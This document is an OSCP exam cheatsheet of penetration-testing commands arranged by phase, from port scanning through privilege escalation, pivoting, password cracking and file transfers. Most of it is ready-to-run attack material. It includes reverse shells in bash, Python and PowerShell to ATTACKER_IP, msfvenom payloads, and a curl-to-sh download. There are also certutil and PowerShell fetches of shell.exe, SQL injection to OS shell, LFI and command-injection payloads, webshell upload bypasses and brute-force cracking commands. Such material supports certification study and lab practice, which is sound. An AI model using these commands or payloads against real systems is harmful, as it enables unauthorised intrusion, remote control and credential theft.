OSCP Cheatsheet 2026

150+ essential commands organized by OSCP exam phase. From initial enumeration to privilege escalation, Active Directory, pivoting, and report writing — everything you need to pass.


# Enumeration

Enumeration is everything in the OSCP. Spend 80% of your time here. Scan all ports, enumerate all services.

## Nmap — Full Scan Strategy

```bash
nmap -p- --min-rate=1000 -T4 TARGET_IP -oN ports.txt
```

Step 1: Fast full TCP port scan to discover all open ports.

```bash
nmap -p OPEN_PORTS -sC -sV -oA detailed TARGET_IP
```

Step 2: Targeted scan with default scripts and version detection on the discovered ports.

```bash
nmap -sU --top-ports 200 --min-rate=1000 TARGET_IP
```

Don't forget UDP: scan the top 200 UDP ports.

## Web Enumeration

```bash
feroxbuster -u http://TARGET -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt -x php,html,txt,bak -t 50
```

Directory brute-force with common extensions (php, txt, bak are OSCP gold).

```bash
whatweb http://TARGET && curl -s http://TARGET -I
```

Identify web technologies and server headers.

```bash
nikto -h http://TARGET -C all
```

Web vulnerability scanner — finds misconfigs and default files.

## SMB Enumeration

```bash
smbclient -N -L //TARGET
```

List SMB shares with a null session (no password).

```bash
enum4linux-ng -A TARGET
```

Full SMB/RPC enumeration — users, shares, groups, password policy.

```bash
crackmapexec smb TARGET -u '' -p '' --shares
```

Enumerate readable shares with CrackMapExec.

## SNMP, LDAP, DNS

```bash
snmpwalk -v2c -c public TARGET 1.3.6.1.2.1
```

SNMP walk with community string "public" — can leak usernames and running processes.

```bash
ldapsearch -H ldap://TARGET -x -b "DC=domain,DC=local" -s sub "(objectClass=user)" sAMAccountName
```

Anonymous LDAP query to enumerate domain users.

```bash
dig axfr @TARGET DOMAIN.LOCAL
```

Attempt a DNS zone transfer.

# Web Exploitation

SQL injection, file upload bypass, command injection — the bread and butter of OSCP web boxes.

## SQL Injection

```bash
sqlmap -u "http://TARGET/page?id=1" --batch --dbs
```

Automated SQLi detection — enumerate databases.

```bash
sqlmap -r request.txt --batch --level 5 --risk 3 --os-shell
```

SQLi from a saved Burp request — get an OS shell if possible.

## File Upload Bypass

```bash
cp /usr/share/webshells/php/php-reverse-shell.php shell.php.jpg
```

Double extension bypass — upload as .php.jpg.

## Command Injection

```text
; whoami
```

Basic command injection test (also try `| whoami`, `` `whoami` ``, `$(whoami)`).

## Local/Remote File Inclusion

```bash
curl "http://TARGET/page?file=../../../etc/passwd"
```

LFI — read /etc/passwd via path traversal.

```bash
curl "http://TARGET/page?file=php://filter/convert.base64-encode/resource=config.php"
```

PHP filter wrapper — read source code as base64.

# Shells & Payloads

Reverse shells, bind shells, and payload generation — know these by heart for the exam.

## Reverse Shells

```bash
bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1
```

Bash reverse shell — the classic.

```bash
python3 -c 'import socket,subprocess,os;s=socket.socket();s.connect(("ATTACKER_IP",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])'
```

Python3 reverse shell.

```powershell
powershell -nop -c "$c=New-Object Net.Sockets.TCPClient('ATTACKER_IP',4444);$s=$c.GetStream();[byte[]]$b=0..65535|%{0};while(($i=$s.Read($b,0,$b.Length)) -ne 0){$d=(New-Object Text.ASCIIEncoding).GetString($b,0,$i);$r=(iex $d 2>&1|Out-String);$s.Write(([text.encoding]::ASCII.GetBytes($r)),0,$r.Length)}"
```

PowerShell reverse shell — for Windows targets.

## Shell Upgrade

```bash
python3 -c 'import pty;pty.spawn("/bin/bash")'
```

Step 1: Spawn a PTY shell.

```bash
export TERM=xterm && stty raw -echo; fg
```

Step 2: Full interactive TTY (press Ctrl+Z to background the shell first, then run this on your own terminal).

## Msfvenom Payloads

```bash
msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKER_IP LPORT=4444 -f exe -o shell.exe
```

Windows x64 reverse shell EXE.

```bash
msfvenom -p linux/x64/shell_reverse_tcp LHOST=ATTACKER_IP LPORT=4444 -f elf -o shell.elf
```

Linux x64 reverse shell ELF binary.

# Linux Privilege Escalation

The OSCP loves Linux privesc. Check SUID, capabilities, cron jobs, writable paths, kernel version.

💡 OSCP Tip: Always run LinPEAS first. Then manually check the findings.

```bash
curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh
```

Run LinPEAS directly — highlights privesc vectors in color.

```bash
find / -perm -4000 -type f 2>/dev/null
```

Find all SUID binaries — check each on GTFOBins.

```bash
sudo -l
```

Check what you can run as root — the #1 privesc vector.

```bash
getcap -r / 2>/dev/null
```

Find binaries with capabilities (cap_setuid = instant root).

```bash
cat /etc/crontab && ls -la /etc/cron*
```

Check cron jobs — are there writable scripts that run as root?

```bash
find / -writable -type f 2>/dev/null | grep -v proc
```

Find world-writable files — potential for path hijacking.

```bash
uname -a && cat /etc/os-release
```

Check the kernel version — search for kernel exploits.

# Windows Privilege Escalation

Services, tokens, AlwaysInstallElevated, unquoted service paths, potatoes — the OSCP classics.

💡 OSCP Tip: Run WinPEAS + PowerUp.ps1 — together they catch most vectors.

```powershell
.\winPEASx64.exe
```

WinPEAS — automated Windows privilege escalation check.

```powershell
powershell -ep bypass -c ". .\PowerUp.ps1; Invoke-AllChecks"
```

PowerUp — finds misconfigurations, weak permissions, unquoted paths.

```cmd
whoami /priv
```

Check current token privileges — SeImpersonate? SeBackup?

```cmd
.\GodPotato.exe -cmd "cmd /c whoami"
```

GodPotato — instant SYSTEM from SeImpersonatePrivilege (works on modern Windows).

```cmd
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
```

Check AlwaysInstallElevated — if 1, generate an MSI payload for SYSTEM.

```cmd
wmic service get name,pathname,startmode | findstr /i /v "C:\Windows"
```

Find unquoted service paths — potential for binary hijacking.

# Pivoting & Tunneling

Reach internal networks through compromised hosts. Chisel, SSH tunnels, ligolo — must-know for OSCP.

## Chisel (Recommended)

```bash
./chisel server -p 8080 --reverse
```

On your Kali: start the Chisel server in reverse mode.

```bash
./chisel client ATTACKER_IP:8080 R:socks
```

On the target: connect back; the reverse SOCKS5 proxy is opened on Kali port 1080.

```bash
proxychains4 nmap -sT -Pn -p 445,3389,5985 INTERNAL_IP
```

Scan the internal network through the SOCKS proxy (full-connect scan, no ICMP).

## SSH Tunneling

```bash
ssh -L 8080:INTERNAL_IP:80 user@PIVOT_IP
```

Local port forward — access the internal web server on localhost:8080.

```bash
ssh -D 1080 user@PIVOT_IP
```

Dynamic SOCKS proxy through SSH — use with proxychains.

# Password Attacks

Cracking hashes, brute-forcing logins — hashcat and John are your best friends.

```bash
hashcat -m 13100 kerberoast.txt /usr/share/wordlists/rockyou.txt --force
```

Crack Kerberoast hashes (TGS-REP, etype 23).

```bash
hashcat -m 18200 asrep.txt /usr/share/wordlists/rockyou.txt --force
```

Crack AS-REP roast hashes.

```bash
john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
```

John the Ripper — auto-detect the hash type and crack.

```bash
hydra -l admin -P /usr/share/wordlists/rockyou.txt TARGET http-post-form "/login:user=^USER^&pass=^PASS^:F=Invalid"
```

Brute-force a web login with Hydra.

# File Transfers

Get tools onto the target and exfil data back. Multiple methods for different situations.

## Linux Targets

```bash
python3 -m http.server 8000
```

On Kali: start an HTTP server to serve files.

```bash
wget http://ATTACKER_IP:8000/linpeas.sh -O /tmp/linpeas.sh && chmod +x /tmp/linpeas.sh
```

On the target: download and make executable.

## Windows Targets

```cmd
certutil -urlcache -split -f http://ATTACKER_IP:8000/shell.exe C:\Windows\Temp\shell.exe
```

Certutil download — works on most Windows versions.

```powershell
powershell -c "(New-Object Net.WebClient).DownloadFile('http://ATTACKER_IP:8000/shell.exe','C:\Windows\Temp\shell.exe')"
```

PowerShell download — alternative to certutil.

# OSCP Exam Tips

Strategy and mindset for the 23-hour-45-minute exam. These tips come from hundreds of OSCP experiences.

- ⏱️ Time management: Don't spend more than 2 hours on a single machine. If stuck, move on and come back later with fresh eyes.
- 📝 Document everything: Screenshot every step as you go. Don't leave reporting for the end; paste evidence into your report template during the exam.
- 🎯 Start with the easy boxes: The standalone machines (non-AD) are often quicker to root. Secure those points first.
- 🔁 Enumerate deeper: If you're stuck, you haven't enumerated enough. Re-run scans with different wordlists, check all ports again, look at source code.
- 🏠 AD set = 40 points: The AD chain is the biggest point block. Practice AD boxes on HackTheBox and TryHackMe before the exam.
- 💤 Take breaks: Sleep 2-4 hours during the exam. Coming back rested often leads to solving what you were stuck on.
